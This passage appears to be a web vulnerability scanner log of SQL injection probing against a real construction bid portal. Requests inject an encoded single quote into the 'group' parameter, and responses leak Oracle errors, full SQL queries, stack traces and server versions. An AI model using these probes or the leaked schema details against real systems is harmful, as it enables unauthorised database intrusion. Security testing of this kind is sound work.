width="240">Password (If Required)</td> <td width="100" class="bodygrn-bold"> </td> </tr> <tr> <td><input type="text" value="0" name="ProjectNo" size="23" style="font-family: Courier; font-size:14px" value=""></td> <td><input type="password" name="password" size="20" style="font-family: Courier; font-size:14px"></td> <td><a href="#" onclick="document.frmSearch.submit(); return false;">Search</a></td> </tr> <tr> <td colspan="2" class="body"> <table border="0" cellspacing="0" cellpadding="0" class="body"> <tr> <td style="line-height:5px"> </td> </tr> <tr> <td> Using the <b>QuestCDN eBidDoc™ Number</b> to access the project advertisement and plan documents is an easy task. Just enter the specific <b>QuestCDN eBidDoc™ Number</b> in the eBidDoc field above and click the 'Search' button. This will take you directly to the full text advertisement for that project. Don't forget to enter the password if you are trying to access a protected or hidden project! </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td></tr><tr> <td></ipp/includes/ipp_coon_rapids_footer.html> </td></tr></table></body></html>
Date: Tue, 01 Mar 2011 20:01:51 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:01:51 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 9652
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse_letting_date.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse_letting_date.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=%2527&provider=765295&sortType=1" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%2527&provider=765295&sortType=1" >Project Results</a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%2527&provider=765295" >Click Here To Sort By Category</a> </td> </tr> </table> </td></tr><tr><!--BGP1--> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:01:52.724 [ 1] (TP-Processor1812) Problem including template component SQLLOOP query=" SELECT TO_CHAR(j.bid_date,'MM/DD/YYYY'), COUNT(j.bid_date) n_projects FROM job_categories jc, jobs j, job_types jt, provider_group pg WHERE jc.job_category_no = j.job_category_no(+) AND j.job_type_no = jt.job_type_no (+) AND ( jt.name <> 'hidden' OR jt.name IS NULL ) AND j.bid_date >= SYSDATE AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no = <?p:group?> GROUP BY TO_CHAR(j.bid_date,'MM/DD/YYYY') ORDER BY TO_CHAR(j.bid_date,'MM/DD/YYYY') asc " name="q1"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-00911: invalid character while executing: SELECT TO_CHAR(j.bid_date,'MM/DD/YYYY'), COUNT(j.bid_date) n_projects FROM job_categories jc, jobs j, job_types jt, provider_group pg WHERE jc.job_category_no = j.job_category_no(+) AND j.job_type_no = jt.job_type_no (+) AND ( jt.name <> 'hidden' OR jt.name IS NULL ) AND j.bid_date >= SYSDATE AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no = %27 GROUP BY TO_CHAR(j.bid_date,'MM/DD/YYYY') ORDER BY TO_CHAR(j.bid_date,'MM/DD/YYYY') asc at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td><!--BGP5--> <td class="body" width="100%" height="100%" valign="top"> <h3>SEARCH PROJECTS</h3> <form name="frmSearch" action="/qap/action/IPPprojectSearch" method="post"> <input type="hidden" name="SearchType" value="1"> <input type="hidden" name="SQL" value=""> <input type="hidden" name="provider" value="765295"> <input type="hidden" name="group" value="%27"> <table width="590" border="0" cellspacing="0"> <tr> <td class="search_label" width="240">QuestCDN eBidDoc™ Number</td> <td class="search_label" width="240">Password (If Required)</td> <td width="100" class="bodygrn-bold"> </td> </tr> <tr> <td><input type="text" value="0" name="ProjectNo" size="23" style="font-family: Courier; font-size:14px" value=""></td> <td><input type="password" name="password" size="20" style="font-family: Courier; font-size:14px"></td> <td><a href="#" onclick="document.frmSearch.submit(); return false;">Search</a></td> </tr> <tr> <td colspan="2" class="body"> <table border="0" cellspacing="0" cellpadding="0" class="body"> <tr> <td style="line-height:5px"> </td> </tr> <tr> <td> Using the <b>QuestCDN eBidDoc™ Number</b> to access the project advertisement and plan documents is an easy task. Just enter the specific <b>QuestCDN eBidDoc™ Number</b> in the eBidDoc field above and click the 'Search' button. This will take you directly to the full text advertisement for that project. Don't forget to enter the password if you are trying to access a protected or hidden project! </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td></tr><tr> <td></ipp/includes/ipp_coon_rapids_footer.html> </td></tr></table></body></html>
|
- /qap/projects/prj_browse/ipp_prj_view.html
/qap/projects/prj_browse/ipp_prj_view.html |
Parameters
| Parameter | Type | Value |
| current_sub_tab | GET | view_projects |
| group | GET | %27 |
| provider | GET | 765295 |
Request
GET /qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%2527&provider=765295 HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:02:46 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:02:46 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 7570
Content-Type: text/html;charset=utf-8
<script language="javascript1.1">function DownloadBidTab(sjobNbr){ req_window = window.open ("/qap/projects/prj_browse/prj_download_bid_tab.html?job_no=" + sjobNbr,"","height=300,width=500");}function ShowViewResults(jobPK){ var w = window.open('/qap/projects/prj_browse/ipp_prj_view.html?ShowProjectDetails=TRUE&viewOnly=TRUE&group=%27&provider=765295&jobPK=' + jobPK, 'ViewResults', 'status,resizable,scrollbars,width=700,height=600'); w.focus();}function PrintPage(){ window.print();}</script><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%2527&provider=765295" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%2527&provider=765295" ><font color=red size=2 >Project Results</font></a> </td> <td> </td> </tr> </table> </td></tr><tr> <td width="100%" height="100%"> <table width="100%" height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="results_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="10"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="40"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="170"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:02:47.072 [ 1] (TP-Processor1670) Problem including template component SQLLOOP query=" SELECT j.job_no, DECODE(j.bid_date, null, null, to_char(j.bid_date,'MM/DD/YYYY')), j.name FROM jobs j WHERE j.job_no in ( SELECT DISTINCT j.job_no FROM jobs j, plan_holders ph, provider_group pg WHERE j.job_no = ph.job_no (+) AND (ph.bid_amount IS NOT NULL or j.bid_tab_file_name is not null) AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no=<?p:group?>) ORDER BY j.bid_date asc " name="Projects"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-00911: invalid character while executing: SELECT j.job_no, DECODE(j.bid_date, null, null, to_char(j.bid_date,'MM/DD/YYYY')), j.name FROM jobs j WHERE j.job_no in ( SELECT DISTINCT j.job_no FROM jobs j, plan_holders ph, provider_group pg WHERE j.job_no = ph.job_no (+) AND (ph.bid_amount IS NOT NULL or j.bid_tab_file_name is not null) AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no=%27) ORDER BY j.bid_date asc at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> </table> </td> <td class="results_detail" valign="top" width="100%"> </td> </tr> </table> </td></tr></table></body></html>
Date: Tue, 01 Mar 2011 20:02:46 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:02:46 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 7570
Content-Type: text/html;charset=utf-8
<script language="javascript1.1">function DownloadBidTab(sjobNbr){ req_window = window.open ("/qap/projects/prj_browse/prj_download_bid_tab.html?job_no=" + sjobNbr,"","height=300,width=500");}function ShowViewResults(jobPK){ var w = window.open('/qap/projects/prj_browse/ipp_prj_view.html?ShowProjectDetails=TRUE&viewOnly=TRUE&group=%27&provider=765295&jobPK=' + jobPK, 'ViewResults', 'status,resizable,scrollbars,width=700,height=600'); w.focus();}function PrintPage(){ window.print();}</script><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%2527&provider=765295" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%2527&provider=765295" ><font color=red size=2 >Project Results</font></a> </td> <td> </td> </tr> </table> </td></tr><tr> <td width="100%" height="100%"> <table width="100%" height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="results_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="10"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="40"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="170"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:02:47.072 [ 1] (TP-Processor1670) Problem including template component SQLLOOP query=" SELECT j.job_no, DECODE(j.bid_date, null, null, to_char(j.bid_date,'MM/DD/YYYY')), j.name FROM jobs j WHERE j.job_no in ( SELECT DISTINCT j.job_no FROM jobs j, plan_holders ph, provider_group pg WHERE j.job_no = ph.job_no (+) AND (ph.bid_amount IS NOT NULL or j.bid_tab_file_name is not null) AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no=<?p:group?>) ORDER BY j.bid_date asc " name="Projects"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-00911: invalid character while executing: SELECT j.job_no, DECODE(j.bid_date, null, null, to_char(j.bid_date,'MM/DD/YYYY')), j.name FROM jobs j WHERE j.job_no in ( SELECT DISTINCT j.job_no FROM jobs j, plan_holders ph, provider_group pg WHERE j.job_no = ph.job_no (+) AND (ph.bid_amount IS NOT NULL or j.bid_tab_file_name is not null) AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no=%27) ORDER BY j.bid_date asc at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> </table> </td> <td class="results_detail" valign="top" width="100%"> </td> </tr> </table> </td></tr></table></body></html>
|
- /qap/projects/prj_browse/ipp_prj_browse.html
/qap/projects/prj_browse/ipp_prj_browse.html |
Parameters
| Parameter | Type | Value |
| jobCategoryNo | GET | 324403 |
| group | GET | %27 |
| provider | GET | 765295 |
Request
GET /qap/projects/prj_browse/ipp_prj_browse.html?jobCategoryNo=324403&group=%2527&provider=765295 HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:02:53 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:02:53 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 9837
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%2527&provider=765295" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%2527&provider=765295" ><font color=red size=2 >Project Results</font></a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=%2527&provider=765295" >Click Here To Sort By Letting Date</a> </td> </tr> </table> </td></tr><tr><!--BGP1--> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:02:54.164 [ 1] (TP-Processor1923) Problem including template component SQLLOOP query=" SELECT jc.Job_Category_No, jc.Name, COUNT(j.Job_Category_No) N_Projects, UPPER(jc.Name) Job_Name FROM Job_Categories jc, Jobs_Job_Categories jjc, Jobs j, Job_Types jt, Job_Display_Types jdt, Provider_Group pg WHERE jc.Job_Category_No = jjc.Job_Category_No(+) AND j.Job_No = jjc.Job_No AND j.Job_Type_No = jt.Job_Type_No (+) AND (jt.Name <> 'hidden' OR jt.Name IS NULL) AND j.Job_Display_Type_No = jdt.Job_Display_Type_No AND jdt.Display_Name LIKE '%QCPI%' AND j.Bid_Date >= TRUNC(SYSDATE) AND (j.Provider_Account_No = pg.Provider_No OR j.Q_Ipp_Owner = pg.Provider_No) AND pg.Provider_Group_No = <?p:group?> GROUP BY jc.Job_Category_No, jc.Name ORDER BY Job_Name ASC" name="q1"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-00911: invalid character while executing: SELECT jc.Job_Category_No, jc.Name, COUNT(j.Job_Category_No) N_Projects, UPPER(jc.Name) Job_Name FROM Job_Categories jc, Jobs_Job_Categories jjc, Jobs j, Job_Types jt, Job_Display_Types jdt, Provider_Group pg WHERE jc.Job_Category_No = jjc.Job_Category_No(+) AND j.Job_No = jjc.Job_No AND j.Job_Type_No = jt.Job_Type_No (+) AND (jt.Name <> 'hidden' OR jt.Name IS NULL) AND j.Job_Display_Type_No = jdt.Job_Display_Type_No AND jdt.Display_Name LIKE '%QCPI%' AND j.Bid_Date >= TRUNC(SYSDATE) AND (j.Provider_Account_No = pg.Provider_No OR j.Q_Ipp_Owner = pg.Provider_No) AND pg.Provider_Group_No = %27 GROUP BY jc.Job_Category_No, jc.Name ORDER BY Job_Name ASC at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at 